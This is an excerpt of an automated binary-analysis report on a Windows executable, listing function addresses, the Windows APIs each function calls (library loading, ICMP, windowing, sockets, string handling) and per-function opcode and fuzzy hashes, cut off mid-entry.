                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpSendEcho
                • API String ID: 2574300362-58917771
                • Opcode ID: 6804e3daa81cabc3cac74647a97cecef990d9c726c90f1e270204cfc1c53cf1f
                • Instruction ID: 41f38e3e7bdf3521981d56c1012aabeebc004aa2f5e6c74cea71611483bd6450
                • Opcode Fuzzy Hash: 6804e3daa81cabc3cac74647a97cecef990d9c726c90f1e270204cfc1c53cf1f
                • Instruction Fuzzy Hash: 6FE01271900716DBD7205FA5E80474677D8DB14751F50842AFD49E2650DBB8E8C086FD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0042125D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0042126F
                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00421281
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpCreateFile
                • API String ID: 2574300362-275556492
                • Opcode ID: ce434f104e8c9c89f622745f2c3b47b10339c384695a84e1bbf397e2ea88f2a9
                • Instruction ID: 87cf97116e0cd441029d75d9a10c666b12ad1817117d496af4898bd56ad3138d
                • Opcode Fuzzy Hash: ce434f104e8c9c89f622745f2c3b47b10339c384695a84e1bbf397e2ea88f2a9
                • Instruction Fuzzy Hash: BEE01271500716DFD7205F65E80474677D8EB24751F50842AFD49E2650DBB9E4C08ABD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0042122B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0042123D
                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0042124F
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpCloseHandle
                • API String ID: 2574300362-3530519716
                • Opcode ID: d9d45e67215f8f6f367de50b11a761438039587dd9dcbb68732f0a387d4f2cdd
                • Instruction ID: af755309ef2cdec499520c49ec1b521163ac12282edddaa94ac91b6e23884184
                • Opcode Fuzzy Hash: d9d45e67215f8f6f367de50b11a761438039587dd9dcbb68732f0a387d4f2cdd
                • Instruction Fuzzy Hash: 13E0EC71540716ABD7205B66E848B467798DB20751B50843AED49E2650D7B8A4C086B9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00420BEC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00420BFE
                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00420C10
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: RegDeleteKeyExW$advapi32.dll
                • API String ID: 2574300362-4033151799
                • Opcode ID: 152206ac43b71e1c153a2ce8fce8105f32347695759ccb3166314ff49a3729d3
                • Instruction ID: e1b06a2afaeda884b1ac4f7ca81694cef2283e9a21e3587190b774ed4a181678
                • Opcode Fuzzy Hash: 152206ac43b71e1c153a2ce8fce8105f32347695759ccb3166314ff49a3729d3
                • Instruction Fuzzy Hash: DFE0C2B150072AEFD7145F62E904643BBD8DB00310F10802FE948A3201D7B9F4C0CAAC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00420D34, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00420D46
                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00420D58
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                • API String ID: 2574300362-1816364905
                • Opcode ID: 4faa9ed58fef2e664c48dbfc813886c53f3cc2e8079b3f75e563f3a53090d860
                • Instruction ID: 99a6d4382f1c9292b126ac072bdfdb8b90a7c10cee70198db22bf76189f02d9d
                • Opcode Fuzzy Hash: 4faa9ed58fef2e664c48dbfc813886c53f3cc2e8079b3f75e563f3a53090d860
                • Instruction Fuzzy Hash: 0BE0C2709007169BDB204FE1F844A4277D89B00710F10802AE848E2640D7F8E4C08AAC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00420DC0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00420DD2
                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00420DE4
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: GetModuleHandleExW$kernel32.dll
                • API String ID: 2574300362-199464113
                • Opcode ID: f155e26033aa3bff8ff49337ea4be77e279103363f8d3da58cce7f3cdc8b63db
                • Instruction ID: 4ded76679cf27212a54155db890fc5a5b0ea5dfc3d264263fdf7e4aa752984fb
                • Opcode Fuzzy Hash: f155e26033aa3bff8ff49337ea4be77e279103363f8d3da58cce7f3cdc8b63db
                • Instruction Fuzzy Hash: C5E012715407169BD7105FA5E804B8677D8DB10751F50842AE949E2651DBB8E4C0CBAD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00400870, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,003FE7C8), ref: 0040087B
                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040088D
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: IsWow64Process$kernel32.dll
                • API String ID: 2574300362-3024904723
                • Opcode ID: 42815604cae0318e973565c634e308a5d4f77cd422ffd84f1d5a09e660a10d1c
                • Instruction ID: 059e8694b438a645289228dc80f0995b23259ef6aeb758d46e748428dfd2e2e8
                • Opcode Fuzzy Hash: 42815604cae0318e973565c634e308a5d4f77cd422ffd84f1d5a09e660a10d1c
                • Instruction Fuzzy Hash: 88D0C9B0D00B029AE7202F31D90870376E4AB00752F24C87AA88DA52A0EBFCC0C08A69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004008E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,003FE820), ref: 004008EB
                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004008FD
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: GetNativeSystemInfo$kernel32.dll
                • API String ID: 2574300362-192647395
                • Opcode ID: 23a4d604d16be24fe9e3963d98cec0d1491b0496671a0a10b1e46b5902091fbf
                • Instruction ID: bdabf9809bc49700b89bfe5dc289a40c5bace340c49b0db9f20f76317925f9a7
                • Opcode Fuzzy Hash: 23a4d604d16be24fe9e3963d98cec0d1491b0496671a0a10b1e46b5902091fbf
                • Instruction Fuzzy Hash: BFD0C9F0D00F069EE7201F31D90870376E4AB00781F20843AA88AA52A5EBFCC0D08A69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00441CA1, Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9c67f30d9d2a33680fbb230f252aed81a3381bcf31a0ccac2350b05e0a0a39e5
                • Instruction ID: 28ab2457cb7f771ad2fc893ff91cfc37f7b1154191a17fed16f56bf6ebd48f9d
                • Opcode Fuzzy Hash: 9c67f30d9d2a33680fbb230f252aed81a3381bcf31a0ccac2350b05e0a0a39e5
                • Instruction Fuzzy Hash: 10E18075600209AFDB14DF98D880EAAB7B9FF88314F10859AF909CB351D775EE81CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004694BA, Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(?), ref: 004694C9
                • SysAllocString.OLEAUT32(00000000), ref: 00469592
                • VariantCopy.OLEAUT32(?,?), ref: 004695C9
                • VariantClear.OLEAUT32(?), ref: 0046960A
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Variant$AllocClearCopyInitString
                • String ID:
                • API String ID: 2808897238-0
                • Opcode ID: 7e7644ac1de94d0586a92694c2572832cf4fca40ab9fe183af627052c9639baf
                • Instruction ID: d5c8de48a1ab6ebd574fbb708a8ae722ef53ca9355ffd93a426679ae20421091
                • Opcode Fuzzy Hash: 7e7644ac1de94d0586a92694c2572832cf4fca40ab9fe183af627052c9639baf
                • Instruction Fuzzy Hash: AF51C436200209A6CB00FF69D8416AAB768EF84351F50853BFE09DB252EB74DE55C7E7
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00439934, Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                Download Yara Rule
                APIs
                • GetWindowRect.USER32 ref: 004399A3
                • ScreenToClient.USER32 ref: 004399D9
                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00439A45
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$ClientMoveRectScreen
                • String ID:
                • API String ID: 3880355969-0
                • Opcode ID: 4e340cec482aa789a49cebca498f47be2cc9b163211c65e423b1127bcc0be7ad
                • Instruction ID: e9837b0f23820f0986cefc8808baab8808613da701a516dcd35af1aa21605fa5
                • Opcode Fuzzy Hash: 4e340cec482aa789a49cebca498f47be2cc9b163211c65e423b1127bcc0be7ad
                • Instruction Fuzzy Hash: 845159716002469FCB14DF58C881AAF77A9FF99314F10922EF8559B390D7B4AD90CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040407F, Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                • String ID:
                • API String ID: 2782032738-0
                • Opcode ID: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
                • Instruction ID: dee04dfacab4e6d6fc2dcd6505ed9022ba17daed1e5e3308399555c6a243befb
                • Opcode Fuzzy Hash: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
                • Instruction Fuzzy Hash: AE41D6B1A006049BDB248F65C94865FB7B5AFD0364F24853EE615BB2C0D778DD91CB88
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004315F9, Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                Download Yara Rule
                APIs
                • ClientToScreen.USER32(00000000,?), ref: 00431621
                • GetWindowRect.USER32 ref: 004316A9
                • PtInRect.USER32(?,?,?), ref: 004316BB
                • MessageBeep.USER32(00000000), ref: 00431734
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Rect$BeepClientMessageScreenWindow
                • String ID:
                • API String ID: 1352109105-0
                • Opcode ID: 495c07c42b34bf515258437dbb2ffdbb60d585d8c4cbae78dddb53b60996e938
                • Instruction ID: 8ec5cffee824b0a5ce7736eec7428de288d035f893a315074fc421ca1c2e46f2
                • Opcode Fuzzy Hash: 495c07c42b34bf515258437dbb2ffdbb60d585d8c4cbae78dddb53b60996e938
                • Instruction Fuzzy Hash: F24183756002049FD714CF99D885EAAB7B5FF99310F1882BBD9158B360C734AC42CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041075F, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00410793
                • __isleadbyte_l.LIBCMT ref: 004107C6
                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000), ref: 004107F7
                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00410865
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 4f03f7ac565ae93dd9220e4c6dcc94ee0e41e109e982c3fef52ece8f77727fc4
                • Instruction ID: 99d885763b9abcc3c5d5f237dbb6ffc9cfb949785a1223b31a1f3233b4ed8615
                • Opcode Fuzzy Hash: 4f03f7ac565ae93dd9220e4c6dcc94ee0e41e109e982c3fef52ece8f77727fc4
                • Instruction Fuzzy Hash: EA31D331A04245EFCB20DF64C880AEA7BA5BF01310B1885BBE4659B2D1D774EDD0DB99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00440311, Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                Download Yara Rule
                APIs
                • GetParent.USER32(?), ref: 0044033E
                • DefDlgProcW.USER32(?,00000138,?,?), ref: 0044038D
                • DefDlgProcW.USER32(?,00000133,?,?), ref: 004403DC
                • DefDlgProcW.USER32(?,00000134,?,?), ref: 0044040D
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Proc$Parent
                • String ID:
                • API String ID: 2351499541-0
                • Opcode ID: 1a285a123b89665f3c92d2cdcfe74bde0e4547506e0cfcbbb530fc5c2f9c12bc
                • Instruction ID: 8a77c48e12b35e5e2e90187d9f5991dc5037ac4bfb9a45fdd9a78c051bf907fb
                • Opcode Fuzzy Hash: 1a285a123b89665f3c92d2cdcfe74bde0e4547506e0cfcbbb530fc5c2f9c12bc
                • Instruction Fuzzy Hash: 1F3176362001046BD620DF29DC44DAB7B64EF95735F14422BFA658B3D2CB759C62C768
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004329A4, Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Message$Peek$DispatchTranslate
                • String ID:
                • API String ID: 1795658109-0
                • Opcode ID: 246ba564bc6380faf2fa79a19fe81fc39dc5e04bbbd89e58d20fd9845e5652d9
                • Instruction ID: c69db1d15f733f954549b4b643282eaa744379eef53ce6b50162aec55f151df6
                • Opcode Fuzzy Hash: 246ba564bc6380faf2fa79a19fe81fc39dc5e04bbbd89e58d20fd9845e5652d9
                • Instruction Fuzzy Hash: EB21A0729083465FEB30DB689E41FFB7BACDB18710F10443FE65486280E6B89845C769
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FE2C0, Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                Download Yara Rule
                APIs
                • _memset.LIBCMT ref: 003FE2E2
                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003FE3A7
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: IconNotifyShell__memset
                • String ID:
                • API String ID: 928536360-0
                • Opcode ID: 0116e38b9503e16218ef42211a03c5d9d91156802fe6f4a28b03824f7f18e9ad
                • Instruction ID: 0b1fb7e06b6c5140920d474a647f867f329f66068ece93684211d3a8dbb23c5a
                • Opcode Fuzzy Hash: 0116e38b9503e16218ef42211a03c5d9d91156802fe6f4a28b03824f7f18e9ad
                • Instruction Fuzzy Hash: 3331A174608704DFD321CF24D8597A7BBE8FB45318F00082EE6DA87290D7B4A948CF56
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00424CD7, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00424C17: lstrlenW.KERNEL32(?), ref: 00424C2A
                  • Part of subcall function 00424C17: lstrcpyW.KERNEL32 ref: 00424C52
                  • Part of subcall function 00424C17: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00424C86
                • lstrlenW.KERNEL32(?), ref: 00424D04
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • lstrcpyW.KERNEL32 ref: 00424D2C
                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00424D72
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: lstrcmpilstrcpylstrlen$_malloc
                • String ID: cdecl
                • API String ID: 3850814276-3896280584
                • Opcode ID: 21fa89e37a2654ffcd1b2e3fdbbd58515fe0bb47a050d1d49f0511941b3075cf
                • Instruction ID: f2e9ab0c961ada87b39922188807c844a1abd5d65ccacaa1267603f6cd1d8369
                • Opcode Fuzzy Hash: 21fa89e37a2654ffcd1b2e3fdbbd58515fe0bb47a050d1d49f0511941b3075cf
                • Instruction Fuzzy Hash: 2821F376211355ABD310AF25EC41EA773A9FF84314F40843EE90A8B650EB38E841C3A8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00448A4E, Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                Download Yara Rule
                APIs
                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00448AAA
                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00448ABC
                • accept.WSOCK32(00000000,00000000,00000000), ref: 00448ACB
                • WSAGetLastError.WSOCK32(00000000), ref: 00448AF0
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
